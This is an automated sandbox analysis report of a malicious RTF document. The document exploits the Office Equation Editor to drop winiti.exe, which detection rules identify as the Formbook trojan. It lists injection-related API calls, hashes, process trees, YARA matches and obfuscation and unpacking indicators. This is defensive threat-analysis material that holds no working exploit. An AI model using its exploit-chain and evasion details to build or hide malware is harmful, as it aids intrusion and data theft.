Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FC48 NtSetInformationFile, 6_2_00D7FC48
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FC60 NtMapViewOfSection, 6_2_00D7FC60
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FC30 NtOpenProcess, 6_2_00D7FC30
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D81D80 NtSuspendThread, 6_2_00D81D80
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FD8C NtDelayExecution, 6_2_00D7FD8C
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FD5C NtEnumerateKey, 6_2_00D7FD5C
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FED0 NtAdjustPrivilegesToken, 6_2_00D7FED0
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FEA0 NtReadVirtualMemory, 6_2_00D7FEA0
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FE24 NtWriteVirtualMemory, 6_2_00D7FE24
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FFFC NtCreateProcessEx, 6_2_00D7FFFC
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FFB4 NtCreateSection, 6_2_00D7FFB4
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D7FF34 NtQueueApcThread, 6_2_00D7FF34
Detected potential crypto function
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_00183D98 5_2_00183D98
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_00183B38 5_2_00183B38
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_005919C0 5_2_005919C0
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_00591DE8 5_2_00591DE8
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_005919B1 5_2_005919B1
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_00592230 5_2_00592230
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_00592220 5_2_00592220
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_00592B50 5_2_00592B50
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_00592718 5_2_00592718
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_00592709 5_2_00592709
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_00181169 5_2_00181169
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 5_2_001804C8 5_2_001804C8
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00401420 6_2_00401420
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00401000 6_2_00401000
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00401154 6_2_00401154
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00401160 6_2_00401160
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00416A4E 6_2_00416A4E
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00416A53 6_2_00416A53
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0040FCCB 6_2_0040FCCB
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0040FCD3 6_2_0040FCD3
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0042E523 6_2_0042E523
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0040FEF3 6_2_0040FEF3
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0040DF73 6_2_0040DF73
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00402FD0 6_2_00402FD0
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D8E0C6 6_2_00D8E0C6
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D8E2E9 6_2_00D8E2E9
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DB63DB 6_2_00DB63DB
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E363BF 6_2_00E363BF
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DDA37B 6_2_00DDA37B
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D92305 6_2_00D92305
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E1443E 6_2_00E1443E
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E105E3 6_2_00E105E3
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DAC5F0 6_2_00DAC5F0
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DD6540 6_2_00DD6540
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D9E6C1 6_2_00D9E6C1
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D94680 6_2_00D94680
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E32622 6_2_00E32622
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DDA634 6_2_00DDA634
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D9C7BC 6_2_00D9C7BC
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D9C85C 6_2_00D9C85C
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DB286D 6_2_00DB286D
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E249F5 6_2_00E249F5
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DA69FE 6_2_00DA69FE
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D929B2 6_2_00D929B2
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E3098E 6_2_00E3098E
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DDC920 6_2_00DDC920
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E16BCB 6_2_00E16BCB
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E3CBA4 6_2_00E3CBA4
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E32C9C 6_2_00E32C9C
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E1AC5E 6_2_00E1AC5E
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D9CD5B 6_2_00D9CD5B
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DC0D3B 6_2_00DC0D3B
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DAEE4C 6_2_00DAEE4C
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DC2E2F 6_2_00DC2E2F
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E02FDC 6_2_00E02FDC
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E2CFB1 6_2_00E2CFB1
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DA0F3F 6_2_00DA0F3F
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DA905A 6_2_00DA905A
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E0D06D 6_2_00E0D06D
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D93040 6_2_00D93040
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DBD005 6_2_00DBD005
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E1D13F 6_2_00E1D13F
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E31238 6_2_00E31238
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D8F3CF 6_2_00D8F3CF
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D97353 6_2_00D97353
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DA1489 6_2_00DA1489
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DC5485 6_2_00DC5485
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DCD47D 6_2_00DCD47D
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E335DA 6_2_00E335DA
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D9351F 6_2_00D9351F
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DC57C3 6_2_00DC57C3
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E1579A 6_2_00E1579A
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E2771D 6_2_00E2771D
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E2F8EE 6_2_00E2F8EE
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E0F8C4 6_2_00E0F8C4
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E1394B 6_2_00E1394B
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E15955 6_2_00E15955
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E43A83 6_2_00E43A83
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D8FBD7 6_2_00D8FBD7
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E1DBDA 6_2_00E1DBDA
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DB7B00 6_2_00DB7B00
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E2FDDD 6_2_00E2FDDD
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00DBDF7C 6_2_00DBDF7C
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00E1BF14 6_2_00E1BF14
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\winiti[1].exe 434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\winiti.exe 434EC59B680788BAE7F2935200A77E681CECBB517D853C6E6CF31F4CF112E5CC
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: String function: 00DD3F92 appears 132 times
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: String function: 00DD373B appears 253 times
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: String function: 00DFF970 appears 84 times
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: String function: 00D8E2A8 appears 60 times
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: String function: 00D8DF5C appears 137 times
Yara signature match
Source: DzokrPQPdy.rtf, type: SAMPLE Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: 6.2.winiti.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.2.winiti.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.453259452.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.453324257.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: winiti[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: winiti.exe.2.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 5.2.winiti.exe.253505c.3.raw.unpack, VU5FiiciHrPuThVwBQ.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.winiti.exe.253505c.3.raw.unpack, VU5FiiciHrPuThVwBQ.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.winiti.exe.240000.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.winiti.exe.240000.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs Cryptographic APIs: 'CreateDecryptor'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, zDIByBvZeeoTUlBtuI.cs Security API names: _0020.SetAccessControl
Source: 5.2.winiti.exe.5150000.4.raw.unpack, zDIByBvZeeoTUlBtuI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 5.2.winiti.exe.5150000.4.raw.unpack, zDIByBvZeeoTUlBtuI.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 5.2.winiti.exe.5150000.4.raw.unpack, hNFj00Hv45CTOkfqEI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.expl.evad.winRTF@7/9@0/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$okrPQPdy.rtf Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Mutant created: NULL
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR7A4D.tmp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
Source: C:\Users\user\AppData\Roaming\winiti.exe Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe"
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe" Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Process created: C:\Users\user\AppData\Roaming\winiti.exe "C:\Users\user\AppData\Roaming\winiti.exe" Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: version.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winhttp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: webio.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: nlaapi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: ntmarta.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: bcrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\winiti.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64win.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: msi.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: rpcrtremote.dll Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Section loaded: dwmapi.dll Jump to behavior
Source: DzokrPQPdy.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\DzokrPQPdy.rtf
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\winiti.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: amWV.pdb source: EQNEDT32.EXE, 00000002.00000002.359904925.00000000006D4000.00000004.00000020.00020000.00000000.sdmp, winiti.exe, 00000005.00000000.359489635.0000000000C72000.00000020.00000001.01000000.00000005.sdmp, winiti.exe.2.dr, winiti[1].exe.2.dr
Source: Binary string: amWV.pdbSHA256 source: winiti.exe, 00000005.00000000.359489635.0000000000C72000.00000020.00000001.01000000.00000005.sdmp, winiti.exe.2.dr, winiti[1].exe.2.dr
Source: Binary string: wntdll.pdb source: winiti.exe, winiti.exe, 00000006.00000002.453421524.0000000000D70000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: amWV.pdbSHA256H! source: EQNEDT32.EXE, 00000002.00000002.359904925.00000000006D4000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains method to dynamically call methods (often used by packers)
Source: 5.2.winiti.exe.253505c.3.raw.unpack, VU5FiiciHrPuThVwBQ.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 5.2.winiti.exe.240000.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
.NET source code contains potential unpacker
Source: winiti[1].exe.2.dr, Form1.cs .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: winiti.exe.2.dr, Form1.cs .Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 5.2.winiti.exe.5150000.4.raw.unpack, zDIByBvZeeoTUlBtuI.cs .Net Code: snOBZDsoZ8 System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_00668F54 push eax; retf 2_2_00668F61
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0065F82A pushad ; iretd 2_2_0065F842
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0066871A push ds; retf 0007h 2_2_0066871C
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006652EA push ecx; retf 0007h 2_2_006652EC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006601F4 push eax; retf 2_2_006601F5
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0066C6DA push ds; retf 2_2_0066C6DC
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_006724AA push es; retf 2_2_006724AC
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00401420 push es; retn 00F1h 6_2_004014F8
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0041F0DC push es; retf 6_2_0041F0E6
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00412104 pushad ; ret 6_2_0041212D
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0040C1EA push edx; retf 6_2_0040C1EE
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00403260 push eax; ret 6_2_00403262
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00426263 push edi; iretd 6_2_0042626E
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00408271 push es; ret 6_2_00408272
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00413A0B push esi; retf 6_2_00413A0E
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00418A13 push ds; retf 2ECDh 6_2_00418BEE
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00418355 push ebp; retf 6_2_004183DC
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00418BA5 push ebx; iretd 6_2_00418BA6
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0041E653 push ds; iretd 6_2_0041E654
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_0041E63B push ebx; iretd 6_2_0041E64C
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_004187CA push ebp; ret 6_2_004187CB
Source: C:\Users\user\AppData\Roaming\winiti.exe Code function: 6_2_00D8DFA1 push ecx; ret 6_2_00D8DFB4
Source: winiti[1].exe.2.dr Static PE information: section name: .text entropy: 7.760978166314589
Source: winiti.exe.2.dr Static PE information: section name: .text entropy: 7.760978166314589
Source: 5.2.winiti.exe.253505c.3.raw.unpack, VU5FiiciHrPuThVwBQ.cs High entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
Source: 5.2.winiti.exe.253505c.3.raw.unpack, cw37txoRO4X56hm21l.cs High entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
Source: 5.2.winiti.exe.240000.0.raw.unpack, VU5FiiciHrPuThVwBQ.cs High entropy of concatenated method names: 'fgoCtXMiTS', 'RgtTUJcyZL', 'g6aXCYEDSs', 'eQtXXHpHK1', 'kgQXo5WvMo', 'rl7XDVFHmZ', 'WdR9wPuHuepeI', 'q3Of0ljuF', 'dAnWKSXiW', 'NMlgX8j6G'
Source: 5.2.winiti.exe.240000.0.raw.unpack, cw37txoRO4X56hm21l.cs High entropy of concatenated method names: 'X1lG3WCB9', 'Qh3mYfMwF', 'zninSfm9E', 'MDb9Ewmta', 'dHqv0oE1o', 'MvWcl4qrS', 'MXJ1VCDef', 'amJ6pCGsS', 'Iynw5Xgff', 'D1JUO7GYj'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, zDIByBvZeeoTUlBtuI.cs High entropy of concatenated method names: 'YqZG3WZfoU', 'MJWG6UQrm1', 'BlQGrky7yt', 'vkTGQsyJoY', 'pVQGuMnV3v', 'UCvG9Faxpm', 'y2kGI2HM7H', 'zwbGvr4qKP', 'zENGL4O6ne', 'TBGGsmgcN9'
Source: 5.2.winiti.exe.5150000.4.raw.unpack, QpyfwtBfq1mip1rA69.cs High entropy of concatenated method names: 'ufQjINFj00', 'k45jvCTOkf', 'WKjjs1VL5w', 'wXvjR7LcS7', 'aOejfGpO8P', 'xVdjcgMYjm', 'BBNg38HtCFLXAi7NE9', 'DZWfXI6iRaiNNcunyW', 'BnojjVDJux', 'bw0jG5WTZn'
